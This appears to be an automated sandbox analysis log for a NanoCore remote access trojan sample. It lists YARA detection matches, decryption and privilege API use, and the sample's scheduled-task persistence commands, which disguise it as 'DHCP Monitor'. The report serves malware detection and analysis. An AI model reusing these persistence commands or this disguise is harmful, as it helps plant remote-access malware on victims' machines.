        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.250cc3c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.250cc3c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.341adf4.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.341adf4.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.34111ef.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.34111ef.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: classification engineClassification label: mal100.troj.evad.winEXE@18/24@16/1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,3_2_00401489
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_01
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ccf3c62d-d356-4a80-bb94-307bc35a5e01}
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Users\user\AppData\Local\Temp\nsr9A59.tmpJump to behavior
        Source: bGf2H3tXGg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: bGf2H3tXGg.exeVirustotal: Detection: 50%
        Source: bGf2H3tXGg.exeReversingLabs: Detection: 68%
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile read: C:\Users\user\Desktop\bGf2H3tXGg.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe 'C:\Users\user\Desktop\bGf2H3tXGg.exe'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe 'C:\Users\user\Desktop\bGf2H3tXGg.exe'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp'
